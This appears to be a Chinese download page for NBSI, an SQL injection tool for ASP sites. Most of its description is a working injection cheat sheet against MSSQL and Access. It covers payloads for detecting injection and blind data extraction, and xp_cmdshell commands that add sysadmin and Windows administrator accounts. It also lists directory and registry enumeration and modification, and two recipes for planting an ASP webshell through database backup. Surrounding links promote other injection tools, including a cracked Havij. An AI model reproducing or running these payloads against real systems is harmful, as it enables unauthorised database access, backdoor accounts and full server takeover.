NBSI注入漏洞检测工具
v3.0.1 绿色中文版 发表评论
- 软件类别:系统安全
- 软件大小:119.00 KB
- 更新时间:2018-11-08 18:41
- 软件版本:v3.0.1 绿色中文版
- 软件语言:中文
- 软件等级:
- 官方网址:暂无
评分:
好评:0
差评:0
软件介绍
NBSI注入漏洞检测工具是一款功能强大的软件,由vb语言编写的网站漏洞检测工具的名称,ASP注入漏洞检测工具,特别在sql server注入检测方面有极高的准确率。
NBSI介绍
1.判断是否有注入
;and 1=1
;and 1=2
2.初步判断是否是mssql
;and user>0
3.判断数据库系统
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
4.注入参数是字符
'and [查询条件] and ''='
5.搜索时没过滤参数的
'and [查询条件] and '%25'='
6.猜数据库
;and (Select Count(*) from [数据库名])>0
7.猜字段
;and (Select Count(字段名) from 数据库名)>0
8.猜字段中记录长度
;and (select top 1 len(字段名) from 数据库名)>0
9.(1)猜字段的ascii值(access)
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0
(2)猜字段的ascii值(mssql)
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0
10.测试权限结构(mssql)
;and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('bulkadmin'));--
;and 1=(SELECT IS_MEMBER('db_owner'));--
11.添加mssql和系统的帐户
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,
username,password;--
;exec master.dbo.sp_addsrvrolemember sysadmin
username;--
;exec master.dbo.xp_cmdshell 'net user username
password /workstations:* /times:all
/passwordchg:yes /passwordreq:yes /active:yes /add'
;--
;exec master.dbo.xp_cmdshell 'net user username
password /add';--
;exec master.dbo.xp_cmdshell 'net localgroup
administrators username /add';--
12.(1)遍历目录
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree 'c:'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not
in('上步得到的paths'))>)
(2)遍历目录
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
;insert into temp(id) exec master.dbo.xp_subdirs 'c:';-- 获得子目录列表
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:';-- 获得所有子目录的目录树结构
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:webindex.asp';-- 查看文件的内容
13.mssql中的存储过程
xp_regenumvalues 注册表根键, 子键
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE',
'SOFTWAREMicrosoftWindowsCurrentVersionRun' 以多个记录集方式返回所有键值
xp_regread 根键,子键,键值名
;exec xp_regread 'HKEY_LOCAL_MACHINE',
'SOFTWAREMicrosoftWindowsCurrentVersion',
'CommonFilesDir' 返回制定键的值
xp_regwrite 根键,子键, 值名, 值类型, 值
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型
;exec xp_regwrite 'HKEY_LOCAL_MACHINE',
'SOFTWAREMicrosoftWindowsCurrentVersion',
'TestValueName','reg_sz','hello' 写入注册表
xp_regdeletevalue 根键,子键,值名
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE',
'SOFTWAREMicrosoftWindowsCurrentVersion',
'TestValueName' 删除某个值
xp_regdeletekey 'HKEY_LOCAL_MACHINE',
'SOFTWAREMicrosoftWindowsCurrentVersionTestkey' 删除键,包括该键下所有值
14.mssql的backup创建webshell
use model
create table cmd(str image);
insert into cmd(str) values ('<% Dim oScript %>');
backup database model to disk='c:l.asp';
15.mssql内置函数
;and (select @@version)>0 获得Windows的版本号
;and user_name()='dbo' 判断当前系统的连接用户是不是sa
;and (select user_name())>0 爆当前系统的连接用户
;and (select db_name())>0 得到当前连接的数据库
16.简洁的webshell
use model
create table cmd(str image);
insert into cmd(str) values ('<%=server.createobject(&wscript.shell&).exec(&cmd.exe /c &&request(&c&)).stdout.readall%>');
backup database model to disk='g:wwwtestl.asp';
请求的时候,像这样子用:
http://ip/l.asp?c=dir
多平台下载
Pc版NBSI注入漏洞检测工具 v3.0.1 绿色中文版
解压密码:www.itmop.com
猜你喜欢
sql注入工具漏洞扫描工具
sql注入工具
sql注入工具能够轻松的进行sql的注入操作,软件功能一般都比较丰富,并且专业性强,是非常强大的软件工具,感兴趣的朋友们千万不要错过哦!快来IT猫扑下载吧!...
漏洞扫描工具
系统漏洞扫描工具有哪些?一般分为web漏洞扫描器,java漏洞扫描工具,网站漏洞扫描工具,漏洞扫描系统,asp漏洞扫描软件等几个大类,所以小编在这里便为大家带来了漏洞扫描软件大全,有需要的朋友可根据自己的实际情况挑选下载!...
本类推荐
卡巴斯基(Kaspersky Internet Security)
360游戏保险箱
星软安全中心
超级巡警(Anti-Spyware Toolkit)
冰源防线
微软恶意软件删除工具Software Removal Tool
360企业版
BackTrack5 r3中文版iso
金山隐私保护器
诺顿Norton PC Checkup本类最新
腾讯电脑管家win10专版v15.0.22122.210 简体中文官方安装版
腾讯电脑管家pc版安装包v15.4.22893.220 官方最新版- 腾讯电脑管家永恒之蓝补丁官方版
腾讯手机管家电脑版310053 官方正式版
360电脑管家最新版2023(安全卫士)v13.0.0.2079 官方正式版
360安全卫士冰雪运动版v15.15.0.0.1021 安装版
火绒安全软件包含扩展工具完整版v5.0.72.1 官方个人免费版- 火绒互联网安全软件v5.0.71.2-2022.11.21.1 官方版
联想电脑管家thinkpad定制版v5.0.10.6271 官方版- QQ腾讯管家一键安装包最新版v16.0 官方最新版
- 2022腾讯电脑管家体验版v16.0.23595.221 官方版
- 腾讯电脑管家个人版pc版v15.4.22893.220 官方正式版
- QQ电脑管家2022最新版v15.4.22893.220 官方版
- 腾讯电脑管家离线安装包(QQPCMgr)v15.4.22893.220 官方安装版
2345安全卫士增强版PC电脑端(自带完整病毒库)v7.9.1.13925 官方最新版
相关软件
.NET版本检测工具(.NET Version Detector)v17R1b 绿色版.NETVersionDetector是小巧简单的.NET检测工具,当你玩游戏时经常会报错安装.NET程序,安装这个程序就可以帮助用户得到解决,使用.NET版本检测工具可以快速检测.NET框架,自动检测并完成安装,欢迎有需要的用户来IT猫扑下载!关
pangolin(穿山甲sql注入工具)v4.1 绿色多语版Pangolin是非常受欢迎的一款SQL注入工具,有了该软件,sql的注入将更加方便,软件不仅可以进行数据导出,还有注入管理,预登陆等多种功能,帮助用户们更好的进行sql注入,感兴趣的朋友们千万不要错过哦!快来IT猫扑下载体验
3ds转cia工具一键转换(3ds simple cia converter)v4.3 汉化版3ds转cia工具是非常方便的3ds一键转cia工具,转换过程一键搞定,更快实现3ds转cia工具一键转换。IT猫扑小编向您推荐3dssimpleciaconverter,非常好用,由网友七支剑汉化,有需要的朋友欢迎来IT猫扑下载使用吧。电脑3ds转cia工
Havij pro(自动化SQL注入工具)v1.19 特别版havij1.19pro破解版可以帮助用户们进行sql的自动化注入,使用起来非常方便,具体的使用方法和相关特色,小编已经为您奉上,感兴趣的朋友们快来IT猫扑下载体验吧!Havijpro(自动化SQL注入工具)介绍:HavijPro是老外写的旁注
下载排行
- 1腾讯电脑管家pc版安装包
系统安全 / 62.96 MB - 2腾讯电脑管家64位
系统安全 / 62.96 MB - 3挖掘鸡
系统安全 / 4.16 MB - 4360安全卫士xp加固版(360xp盾甲)
系统安全 / 63.40 MB - 5qq电脑管家xp专业保护版
系统安全 / 62.96 MB - 6天融信终端防御系统
系统安全 / 14.70 MB - 7360闪电云鉴定器独立版
系统安全 / 2.83 MB - 8木马分析专家freepc
系统安全 / 27.25 MB - 9腾讯电脑管家个人版pc版
系统安全 / 62.96 MB - 10金山毒霸CPU漏洞免疫工具
系统安全 / 1.62 MB
网友评论
查看所有0条评论